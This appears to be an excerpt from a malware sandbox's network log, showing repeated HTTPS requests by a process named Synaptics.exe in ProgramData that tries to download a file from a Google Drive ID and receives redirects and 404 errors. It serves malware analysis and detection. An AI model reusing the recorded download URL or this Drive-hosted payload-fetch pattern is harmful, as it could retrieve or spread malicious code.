                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    26 | 192.168.2.4 | 49780 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:14 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:15 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6mqJwtfrff6dEMz2zdI-MZFVEfWBAi9ogwB5EJjBSR-kiKsOHS3hybyISElQzyj6YfFc8Zbf8
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:15 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Hf0HhBYGkcFyoCnC1j0V8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:15 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:15 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="-mZ-PQ_1nEX6uDmPluI9NQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:15 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49788 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:15 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:16 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5yiLlsHAC2osUDoJ3wZEZkaT_Ww5dW-IkL58V0oCyHflEwfJXLeAYrp7Y76LcdbirVhiQI3uc
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Dh4VrrvCx2pVOWGDxtQUDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:16 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:16 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="nSySyTfUZ_n0QdcnyxfdyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:16 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49789 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:15 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:16 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4RQLENhRrvzVqueDdzDHQpf4Jyu2yxE_Qp7ZHkhQmYZooQDyTlYdORTrkc-HnRm03K
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UMQ1vjRA9WsUbxq4ad4D_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:16 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:16 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="IKkkCkYAdpM7tO-KJRVypA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:16 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49786 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YlG8jt15DeWibx6e_1AmGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49787 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-vRyUsLoXHXrI1679JEGQrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    31 | 192.168.2.4 | 49794 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AZnOSpdX63AYzK624azC-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    32 | 192.168.2.4 | 49795 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:16 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Tuys9KORT7QrWG7Ip2T8eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    33 | 192.168.2.4 | 49796 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:16 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4cPH-EFvyhaaOG3jl0QVAJ7Aq--e6zYx6DNSk_4BnFzbgH6BhgII_ExjeKyJjFUGlc
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--3PEMSapH6wrPvKcz47n3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="TGz05i4U0NSinMr3N7nHLQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    34 | 192.168.2.4 | 49797 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:17 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Tyqq2iivl5ayogLnwsjEQwiETwMCPrg0tfvhIPEHjcp24apnx8POGc7JaejbW7lkBeSN3jcY
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4pfC2-T8JB2ftMNmFRl1Fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:17 UTC | 140 | IN
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:17 UTC | 1390 | IN
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="fQF4ltuCm6aDyk2DhU0oGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:17 UTC | 122 | IN
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49799 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:17 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
